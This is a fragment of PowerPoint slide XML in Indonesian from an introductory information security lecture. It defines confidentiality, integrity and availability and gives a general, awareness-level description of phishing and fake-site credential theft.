              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diberi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>wewenang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksplisit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengaksesnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Integritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditransfer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dimaksudkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>modifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diotorisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berwenang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melihat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memodifikasinya</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3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="710449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Phishing dan Pharming</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Phishing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kombinasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rekayasa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sosial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan spoofing. Phishing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membujuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelabui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berinteraksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbahaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyamar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepercaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> email </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>vektornya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> phishing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencoba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meyakinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tindakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menginstal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> malware yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disamarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengizinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>koneksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Jenis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kampanye</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> phishing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>palsu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meniru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> bank </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs e-commerce </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> web lain yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seharusnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipercaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh target. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemudian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengirim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> email </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>asli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tahu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperbarui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peringatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> alarm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tipuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tautan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terselubung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebenarnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengarah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>palsu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ketika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>palsu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> login </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditangkap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Phishing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merujuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>vektor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> email </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jenis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> media </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
